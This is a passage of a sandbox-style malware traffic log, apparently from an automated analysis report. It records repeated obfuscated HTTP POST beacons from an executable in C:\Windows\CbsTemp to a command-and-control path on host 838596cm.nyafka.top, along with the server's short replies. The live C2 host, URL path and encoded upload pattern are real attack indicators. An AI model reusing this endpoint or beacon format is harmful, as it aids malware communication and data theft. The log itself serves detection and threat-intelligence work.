                                                                                                          Data Ascii: UU[UY\V[^_WTV_Y[WSX\P_VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [<3_$?-;44=>=*;&0.Q(";)?!.7\-/#_&'P-#
                                                                                                          Jan 8, 2025 17:14:03.128411055 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:03.374466896 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:03 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ad7MU9YGwf7p3L0%2F2jzwr7NgnoqODvUc33hzB5%2FoA5FHoONuodLV3QCgL8hG7Pyyda9Sn7XSko%2FPZr04N2A1lAjP3RXKtYxYcDTBa5h7pT4OBnLwqdXywtJvVX7NRc4ROxbVuTVT"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a753a98c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7819&min_rtt=1486&rtt_var=13223&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=27995&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          84192.168.2.550067104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:03.537370920 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:03.895124912 CET2532OUTData Raw: 55 52 5e 52 59 51 56 5b 5e 5f 57 54 56 5a 59 53 57 50 58 5d 50 59 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR^RYQV[^_WTVZYSWPX]PYV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Y?;#':^>/$?=>")(:'+-("$)76=#\-#_&'P-7
                                                                                                          Jan 8, 2025 17:14:03.981453896 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:04.148511887 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saXob2Fwkbk83GgOTRKfOPbltq1RqpBjPd03UI1gC5%2Bn418ceMgYymf8jkDiNGdlLEVGTUIF5CZ8qMzBC4kV8fYA3YpAE6sstEoqaNRgJ36VcFciQvO%2FIJ2ljpMZBt99Mi9qXC%2BQ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a7a991e727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2662&min_rtt=1956&rtt_var=2146&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=191878&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          85192.168.2.550068104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:04.278474092 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:04.631182909 CET2532OUTData Raw: 55 54 5b 55 59 51 56 52 5e 5f 57 54 56 5d 59 53 57 53 58 5d 50 5e 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT[UYQVR^_WTV]YSWSX]P^VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X(($%=>!/3\=!>*'].S<!,*/# -':#_&'P-+
                                                                                                          Jan 8, 2025 17:14:04.724082947 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:04.904283047 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KC46BKDX44FaJ2dpZO2CcJpsps5hug4XoZAPzeuIzcsrBXyNbYPuQsur%2FMq24%2FGzfiXVSgXRAQMbtakQ67d3NhFTmsMFpvjIrpp%2BlvLAwKn7ZIS%2BqyoSedNnV3mSAx%2FseTpCA8uI"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a7f3f03727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2017&rtt_var=781&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=723847&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          86192.168.2.550069104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:05.550946951 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:05.895107985 CET2532OUTData Raw: 50 51 5e 52 59 58 53 5b 5e 5f 57 54 56 59 59 5f 57 55 58 59 50 5e 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^RYXS[^_WTVYY_WUXYP^V][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(8+X'">[=;'4?.2>;"&(.Q(=8[ .?9/#_&'P-
                                                                                                          Jan 8, 2025 17:14:06.015132904 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:06.263859034 CET810INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:06 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBIlbTxXZ%2FVPqInvlN%2FlSwcGZqb7yDi2XmWvK%2BToyccEAPR%2B7WNSxLw6sWlJnA0suuaQUB%2BeZnNC3CvOMLXeKyWNsY0K%2FCBN9BeKErC6R5TejiTYR2jgKvC6nWhmwr5dYMb9sB3F"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a874e97c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4437&min_rtt=1476&rtt_var=6475&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=58017&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          87192.168.2.550070104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:06.400717974 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:06.754622936 CET2532OUTData Raw: 55 51 5e 51 59 50 53 58 5e 5f 57 54 56 57 59 58 57 53 58 5d 50 54 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ^QYPSX^_WTVWYXWSX]PTV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z+^70 &Z>6;$'X>>]'!)"#^(? >#^9?#_&'P-
                                                                                                          Jan 8, 2025 17:14:06.857709885 CET25INHTTP/1.1 100 Continue


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          88192.168.2.550071104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:06.979677916 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:07.332565069 CET1828OUTData Raw: 55 57 5e 50 59 5b 53 59 5e 5f 57 54 56 5a 59 5a 57 52 58 5e 50 5c 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW^PY[SY^_WTVZYZWRX^P\V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+8<'U>Y>-\,'0>-9^=+0;&<!;Y*([6=/\,?#_&'P-7
                                                                                                          Jan 8, 2025 17:14:07.423688889 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:07.697705984 CET957INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ja4Oqk1jQfQwdEoXmSsp5akb1ApydxEq5uUBXYnyuXW%2FTCoOHhkDSAPpHnAiTrWAZWiI6oA%2FiPDOzmUZN59Z%2F2iMvxs%2BlSQgC9iYgE1plu8%2BIvJCtpJtLaqLw9h6t7Wh7QMBECnl"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a901e58727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2019&rtt_var=919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=547431&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0c 33 3e 2c 59 34 15 08 08 2b 39 38 06 29 33 0f 03 39 39 2f 03 26 34 38 5e 25 12 01 01 23 01 25 5a 2b 06 07 59 30 50 33 0f 2a 2b 20 5c 04 1f 24 5c 3c 38 31 56 29 3f 2d 07 26 33 31 5c 25 33 20 5c 26 2d 27 11 30 07 32 1d 34 29 3c 0e 3b 20 3e 1b 2f 3b 33 05 3c 37 0e 5b 26 2e 2f 50 0f 10 38 18 2e 2a 33 5d 36 31 2a 54 20 33 16 01 23 35 0a 5b 3d 3e 27 54 35 59 3d 5b 24 1d 22 08 21 22 20 0c 27 55 33 5a 3f 0f 34 1d 28 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'3>,Y4+98)399/&48^%#%Z+Y0P3*+ \$\<81V)?-&31\%3 \&-'024)<; >/;3<7[&./P8.*3]61*T 3#5[=>'T5Y=[$"!" 'U3Z?4($U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          89192.168.2.550072104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:07.510102034 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:07.867140055 CET2532OUTData Raw: 55 53 5e 52 59 50 53 5c 5e 5f 57 54 56 5d 59 53 57 54 58 5c 50 55 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US^RYPS\^_WTV]YSWTX\PUVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +($' 2Z)[![,$Z=.^)8)0&+T;*<( >#]-#_&'P-+
                                                                                                          Jan 8, 2025 17:14:07.973277092 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:08.208106041 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:08 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bx4PFhhD5%2BewTlvDfpUaNRpgil3Oy73UdJjZuDYfbI3ipCCz%2FXRBQ8OEe%2BKYoTAqw7ZaqEWEZQEO7O8fId4kQgy2pq0uwmizIa3Ox47WXEfD2EVZ%2FVqNHd9T8b403Tq6u9RjeEsJ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a938ec1424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7989&min_rtt=1749&rtt_var=13136&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=28256&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:08.298669100 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          90192.168.2.550073104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:08.704027891 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:09.051333904 CET2532OUTData Raw: 55 5c 5e 53 5c 5f 53 58 5e 5f 57 54 56 59 59 52 57 5f 58 52 50 5f 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^S\_SX^_WTVYYRW_XRP_V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?(33>[9/(*>1Z=+!';V</\>+6=Y-#_&'P-
                                                                                                          Jan 8, 2025 17:14:09.163516998 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:09.340553045 CET799INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsbD39Rik8sFkLUffDN%2F8q%2ByTpPJzRrfdwkde0FjRHZrqu9Vh92v2uiNtprQmo0yjc%2FuDno4oelGF8j9Lp04dLfhebkYmATvp4v1Z2MXSCRfuNKJrjnyEHjWEGOj3m8kPjsyqDeP"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7a9afaaf43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3495&min_rtt=1575&rtt_var=4430&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=86211&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:14:09.430212975 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          91192.168.2.550074104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:09.556314945 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:09.910662889 CET2532OUTData Raw: 55 53 5b 55 5c 5c 56 5c 5e 5f 57 54 56 5a 59 58 57 51 58 5b 50 59 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US[U\\V\^_WTVZYXWQX[PYVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <^3]%#->>9,$#=-)[>X3+.S+3^=< ]"=X-/#_&'P-7
                                                                                                          Jan 8, 2025 17:14:10.003874063 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:10.246557951 CET810INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:10 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPp9R7CnbkpNeH7KxsAteXsMBZsmTrFNzSlJeg0J%2FPVlAb9sjbmsmsmZ6%2B8BpD%2FyBU%2BDf5%2ByVknmExYnz%2FqviQGjdDVZgQZJUmGsASi6Ip37YBUxNyU8XQqhBtGignLCYFLmANK3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7aa03b8443b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5449&min_rtt=3772&rtt_var=4770&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=84913&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          92192.168.2.550075104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:10.390377045 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:10.739021063 CET2532OUTData Raw: 55 51 5b 54 59 50 53 59 5e 5f 57 54 56 5c 59 5d 57 50 58 53 50 5a 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ[TYPSY^_WTV\Y]WPXSPZV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _($>)",4?="(+!&;&S??*<!='-?#_&'P-/
                                                                                                          Jan 8, 2025 17:14:10.866142035 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:11.117414951 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:11 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
